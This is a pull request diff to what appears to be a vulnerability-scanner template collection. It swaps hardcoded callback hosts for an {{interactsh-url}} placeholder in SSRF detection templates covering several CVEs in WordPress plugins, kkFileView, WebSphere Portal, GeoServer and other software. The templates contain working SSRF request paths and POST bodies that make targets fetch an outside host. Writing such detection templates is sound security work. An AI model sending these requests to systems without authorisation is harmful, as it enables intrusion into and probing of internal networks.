### PR TITLE
SSRF based templates improved

### DIFF
--- a/http/cves/2019/CVE-2019-18394.yaml
+++ b/http/cves/2019/CVE-2019-18394.yaml
@@ -26,7 +26,7 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/getFavicon?host=http://oast.fun/"
+      - "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}/"
 
     matchers:
       - type: dsl

--- a/http/cves/2021/CVE-2021-24472.yaml
+++ b/http/cves/2021/CVE-2021-24472.yaml
@@ -24,12 +24,12 @@ info:
     framework: wordpress
     vendor: qantumthemes
     product: kentharadio
-  tags: wordpress,lfi,ssrf,wp,wp-plugin,wpscan,cve,cve2021
+  tags: wordpress,lfi,ssrf,wp,wp-plugin,wpscan,cve,cve2021,oast
 
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me'
+      - '{{BaseURL}}/wp1/home-18/?qtproxycall=https://{{interactsh-url}}'
 
     matchers-condition: and
     matchers:

--- a/http/cves/2021/CVE-2021-27670.yaml
+++ b/http/cves/2021/CVE-2021-27670.yaml
@@ -22,12 +22,12 @@ info:
     shodan-query: title:"Appspace"
     vendor: appspace
     product: appspace
-  tags: cve,cve2023,appspace,ssrf
+  tags: cve,cve2023,appspace,ssrf,oast
 
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'
+      - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://{{interactsh-url}}'
 
     matchers-condition: and
     matchers:

--- a/http/cves/2021/CVE-2021-27748.yaml
+++ b/http/cves/2021/CVE-2021-27748.yaml
@@ -16,13 +16,13 @@ info:
     max-request: 2
     verified: true
     shodan-query: http.html:"IBM WebSphere Portal"
-  tags: cve,cve2021,hcl,ibm,ssrf,websphere
+  tags: cve,cve2021,hcl,ibm,ssrf,websphere,oast
 
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
-      - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
+      - '{{BaseURL}}/docpicker/internal_proxy/http/{{interactsh-url}}'
+      - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/{{interactsh-url}}'
 
     host-redirects: true
     max-redirects: 2

--- a/http/cves/2021/CVE-2021-29490.yaml
+++ b/http/cves/2021/CVE-2021-29490.yaml
@@ -29,8 +29,8 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/"
-      - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"
+      - "{{BaseURL}}/Images/Remote?imageUrl=https://{{interactsh-url}}/"
+      - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://{{interactsh-url}}/&ProviderName=TheMovieDB"
 
     stop-at-first-match: true
     matchers:

--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -32,10 +32,10 @@ http:
   - raw:
       - |
         POST /geoserver/TestWfsPost HTTP/1.1
-        Host: oast.pro
+        Host: {{interactsh-url}}
         Content-Type: application/x-www-form-urlencoded
 
-        form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=
+        form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
 
     matchers-condition: and
     matchers:

--- a/http/cves/2022/CVE-2022-24856.yaml
+++ b/http/cves/2022/CVE-2022-24856.yaml
@@ -26,12 +26,12 @@ info:
     max-request: 1
     vendor: flyte
     product: flyte_console
-  tags: cve,cve2022,flyteconsole,ssrf,oss,hackerone
+  tags: cve,cve2022,flyteconsole,ssrf,oss,hackerone,oast
 
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/cors_proxy/https://oast.me/"
+      - "{{BaseURL}}/cors_proxy/https://{{interactsh-url}}/"
 
     matchers:
       - type: word

--- a/http/cves/2022/CVE-2022-2633.yaml
+++ b/http/cves/2022/CVE-2022-2633.yaml
@@ -26,13 +26,13 @@ info:
     framework: wordpress
     vendor: plugins360
     product: all-in-one_video_gallery
-  tags: cve2022,wp-plugin,unauth,ssrf,wpscan,cve,wordpress,wp,all-in-one-video-gallery
+  tags: cve2022,wp-plugin,unauth,ssrf,wpscan,cve,wordpress,wp,all-in-one-video-gallery,oast
 
 http:
   - raw:
       - |
         @timeout: 10s
-        GET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1
+        GET /index.php/video/?dl={{base64('https://{{interactsh-url}}/')}} HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and

--- a/http/cves/2022/CVE-2022-2756.yaml
+++ b/http/cves/2022/CVE-2022-2756.yaml
@@ -26,7 +26,7 @@ info:
     verified: true
     vendor: kavitareader
     product: kavita
-  tags: ssrf,kavita,authenticated,huntr,cve,cve2022,intrusive
+  tags: ssrf,kavita,authenticated,huntr,cve,cve2022,intrusive,oast
 
 http:
   - raw:

--- a/http/cves/2022/CVE-2022-43140.yaml
+++ b/http/cves/2022/CVE-2022-43140.yaml
@@ -24,12 +24,12 @@ info:
     verified: true
     vendor: keking
     product: kkfileview
-  tags: cve,cve2022,ssrf,kkFileview
+  tags: cve,cve2022,ssrf,kkFileview,oast
 
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"
+      - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://{{interactsh-url}}')}}"
 
     matchers:
       - type: word

--- a/http/vulnerabilities/kkfileview-ssrf.yaml
+++ b/http/vulnerabilities/kkfileview-ssrf.yaml
@@ -16,12 +16,12 @@ info:
     fofa-query: app="kkFileView"
     shodan-query: http.html:"kkFileView"
     verified: true
-  tags: ssrf,kkfileview
+  tags: ssrf,kkfileview,oast
 
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/onlinePreview?url={{base64('http://oast.fun/robots.txt')}}"
+      - "{{BaseURL}}/onlinePreview?url={{base64('http://{{interactsh-url}}/robots.txt')}}"
 
     extractors:
       - type: regex

--- a/http/vulnerabilities/splash/splash-render-ssrf.yaml
+++ b/http/vulnerabilities/splash/splash-render-ssrf.yaml
@@ -17,7 +17,7 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/render.html?url=https://oast.live"
+      - "{{BaseURL}}/render.html?url=https://{{interactsh-url}}"
 
     matchers-condition: and
     matchers:

--- a/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml
+++ b/http/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml
@@ -12,7 +12,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cwe-id: CWE-94
-  tags: wordpress,rce,ssrf,edb,wpscan
+  tags: wordpress,rce,ssrf,edb,wpscan,oast
   metadata:
     max-request: 1
 
@@ -23,7 +23,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=https://oast.me/
+        action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=https://{{interactsh-url}}/
 
     matchers-condition: and
     matchers:


### PR DESCRIPTION
### Template information

SSRF-based templates were improved as they use {{interactsh-url}} parameter.

### Now why it's necessary to change `oast.me` or `oast.fun`  to  `{{interactsh-url}}`?

- For compliance issues and keeping logs.
